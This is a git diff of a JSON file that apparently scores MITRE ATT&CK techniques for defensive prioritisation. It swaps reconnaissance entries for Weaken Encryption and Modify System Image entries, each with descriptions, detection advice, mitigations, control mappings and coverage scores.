+                "detection": "There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.",
+                "mitigations": []
             },
             {
-                "tid": "T1595.002",
-                "name": "Active Scanning: Vulnerability Scanning",
-                "url": "https://attack.mitre.org/techniques/T1595/002",
-                "description": "Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.\n\nThese scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).",
-                "detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            }
-        ],
-        "mitigations": [
-            {
-                "mid": "M1056",
-                "name": "Pre-compromise",
-                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1056"
+                "tid": "T1600.002",
+                "name": "Weaken Encryption: Disable Crypto Hardware",
+                "url": "https://attack.mitre.org/techniques/T1600/002",
+                "description": "Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.\n\nMany network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)",
+                "detection": "There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.",
+                "mitigations": []
             }
-        ],
-        "cumulative_score": 0.06904761904761905,
-        "adjusted_score": 0.06904761904761905,
+        ],
+        "mitigations": [],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [
-            "18.2",
-            "18.3"
-        ],
+        "cis_controls": [],
         "nist_controls": [],
         "process_coverage": false,
-        "network_coverage": true,
-        "file_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
         "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.01904761904761905,
-            "mitigation_score": 0.03636363636363636
-        },
+        "actionability_score": {},
         "choke_point_score": 0.05,
         "prevalence_score": 0
     },
     {
-        "tid": "T1596",
-        "name": "Search Open Technical Databases",
-        "description": "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)\n\nAdversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
-        "url": "https://attack.mitre.org/techniques/T1596",
+        "tid": "T1600.001",
+        "name": "Weaken Encryption: Reduce Key Space",
+        "description": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)\n\nAdversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.\n\nAdversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)",
+        "url": "https://attack.mitre.org/techniques/T1600/001",
         "tactics": [
-            "Reconnaissance"
+            "Defense Evasion"
         ],
-        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "detection": "There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.",
         "platforms": [
-            "PRE"
+            "Network"
+        ],
+        "data_sources": [
+            "File: File Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1600",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1600.002",
+        "name": "Weaken Encryption: Disable Crypto Hardware",
+        "description": "Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.\n\nMany network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)",
+        "url": "https://attack.mitre.org/techniques/T1600/002",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.",
+        "platforms": [
+            "Network"
+        ],
+        "data_sources": [
+            "File: File Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1600",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1601",
+        "name": "Modify System Image",
+        "description": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.\n\nTo change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it.  This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.",
+        "url": "https://attack.mitre.org/techniques/T1601",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Most embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because this method may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. \n\nCompare the checksum of the operating system file with the checksum of a known good copy from a trusted source.  Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not.  Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.  (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory.  If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)",
+        "platforms": [
+            "Network"
+        ],
+        "data_sources": [
+            "File: File Modification"
         ],
-        "data_sources": [],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1596.001",
-                "name": "Search Open Technical Databases: DNS/Passive DNS",
-                "url": "https://attack.mitre.org/techniques/T1596/001",
-                "description": "Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.\n\nAdversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+                "tid": "T1601.001",
+                "name": "Modify System Image: Patch System Image",
+                "url": "https://attack.mitre.org/techniques/T1601/001",
+                "description": "Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file.  Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection.  The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.\n\nTo change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system.  This method typically requires administrative level access to the device.\n\nIn the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system.  Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory.  This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.\n\nBy modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599).  Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).\n\nAdversaries may also compromise existing commands in the operating system to produce false output to mislead defenders.   When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system.  By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. \n\nWhen the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). \n\nWhen the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots.  However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. ",
+                "detection": "Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source.  Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not.  Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory.  If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)",
                 "mitigations": [
                     {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1596.002",
-                "name": "Search Open Technical Databases: WHOIS",
-                "url": "https://attack.mitre.org/techniques/T1596/002",
-                "description": "Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)\n\nAdversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
+                        "mid": "M1046",
+                        "name": "Boot Integrity",
+                        "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                        "url": "https://attack.mitre.org/mitigations/M1046"
+                    },
                     {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1596.003",
-                "name": "Search Open Technical Databases: Digital Certificates",
-                "url": "https://attack.mitre.org/techniques/T1596/003",
-                "description": "Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.\n\nAdversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
+                        "mid": "M1045",
+                        "name": "Code Signing",
+                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                        "url": "https://attack.mitre.org/mitigations/M1045"
+                    },
                     {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1596.004",
-                "name": "Search Open Technical Databases: CDNs",
-                "url": "https://attack.mitre.org/techniques/T1596/004",
-                "description": "Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.\n\nAdversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
+                        "mid": "M1043",
+                        "name": "Credential Access Protection",
+                        "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
+                        "url": "https://attack.mitre.org/mitigations/M1043"
+                    },
                     {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
                     }
                 ]
             },
             {
-                "tid": "T1596.005",
-                "name": "Search Open Technical Databases: Scan Databases",
-                "url": "https://attack.mitre.org/techniques/T1596/005",
-                "description": "Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)\n\nAdversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+                "tid": "T1601.002",
+                "name": "Modify System Image: Downgrade System Image",
+                "url": "https://attack.mitre.org/techniques/T1601/002",
+                "description": "Adversaries may install an older version of the operating system of a network device to weaken security.  Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage.  With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart.  The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\n\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).  Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).  ",
+                "detection": "Many embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. ",
                 "mitigations": [
                     {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
+                        "mid": "M1046",
+                        "name": "Boot Integrity",
+                        "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                        "url": "https://attack.mitre.org/mitigations/M1046"
+                    },
+                    {
+                        "mid": "M1045",
+                        "name": "Code Signing",
+                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                        "url": "https://attack.mitre.org/mitigations/M1045"
+                    },
+                    {
+                        "mid": "M1043",
+                        "name": "Credential Access Protection",
+                        "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
+                        "url": "https://attack.mitre.org/mitigations/M1043"
+                    },
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
                     }
                 ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1056",
-                "name": "Pre-compromise",
-                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1056"
+                "mid": "M1046",
+                "name": "Boot Integrity",
+                "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                "url": "https://attack.mitre.org/mitigations/M1046"
+            },
+            {
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            },
+            {
+                "mid": "M1043",
+                "name": "Credential Access Protection",
+                "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
+                "url": "https://attack.mitre.org/mitigations/M1043"
+            },
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             }
         ],
-        "cumulative_score": 0.05,
-        "adjusted_score": 0.05,
+        "cumulative_score": 0.46190476190476193,
+        "adjusted_score": 0.46190476190476193,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
         "cis_controls": [],
-        "nist_controls": [],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-8",
+            "CM-2",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-5",
+            "IA-7",
+            "RA-9",
+            "SA-10",
+            "SA-11",
+            "SC-34",
+            "SI-2",
+            "SI-4",
+            "SI-7",
+            "SR-11",
+            "SR-4",
+            "SR-5",
+            "SR-6"
+        ],
         "process_coverage": false,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
         "hardware_coverage": false,
-        "actionability_score": {},
-        "choke_point_score": 0.05,
+        "actionability_score": {
+            "combined_score": 0.36190476190476195,
+            "mitigation_score": 0.6909090909090909
+        },
+        "choke_point_score": 0.1,
         "prevalence_score": 0
     },
     {
-        "tid": "T1597",
-        "name": "Search Closed Sources",
-        "description": "Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)\n\nAdversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
-        "url": "https://attack.mitre.org/techniques/T1597",
+        "tid": "T1601.001",
+        "name": "Modify System Image: Patch System Image",
+        "description": "Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file.  Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection.  The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.\n\nTo change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system.  This method typically requires administrative level access to the device.\n\nIn the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system.  Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory.  This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.\n\nBy modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device 